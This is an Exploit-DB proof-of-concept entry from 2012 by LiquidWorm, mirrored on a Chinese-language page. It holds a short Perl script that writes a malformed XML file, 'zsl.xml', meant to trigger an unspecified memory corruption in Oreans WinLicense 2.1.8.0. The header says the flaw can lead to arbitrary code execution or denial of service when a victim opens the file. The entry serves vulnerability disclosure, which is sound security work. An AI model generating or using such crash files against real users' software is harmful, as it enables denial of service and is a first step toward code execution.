Oreans WinLicense – XML File Handling Memory Corruption

  • 作者: LiquidWorm
    日期: 2012-03-21
  • 类别:
  • 来源:https://www.exploit-db.com/exploits/18637/
  • #!/usr/bin/perl
    # Oreans WinLicense v2.1.8.0 XML File Handling Unspecified Memory Corruption
    # Vendor: Oreans Technologies
    # Product web page: http://www.oreans.com
    # Affected version: (32/64bit)
    # Summary: WinLicense combines the same protection-level as Themida with the
    # power of advanced license control, offering the most powerful and flexible
    # technology that allows developers to securely distribute trial and registered
    # versions of their applications.
    # Desc: WinLicense is prone to an unspecified memory corruption vulnerability.
    # An attacker can exploit this issue by tricking a victim into opening a malicious
    # XML file to execute arbitrary code and to cause denial-of-service conditions.
    # Tested on: Microsoft Windows XP Professional SP3 (EN) (32bit)
    #Microsoft Windows 7 Ultimate SP1 (EN) (64bit)
    # Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
    # @zeroscience
    # Advisory ID: ZSL-2012-5080
    # Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2012-5080.php
    # 20.03.2012
    use strict;
    my $file = "zsl.xml";
    my $hit = "Joxy-\\x\\-Poxy";
    print "\n\n[*] Creating $file file...\n";
    open ZSL, ">./$file" || die "\nCan't open $file: $!";
    print ZSL $hit;
    print "\n[.] File successfully mounted!\n\n";
    close ZSL;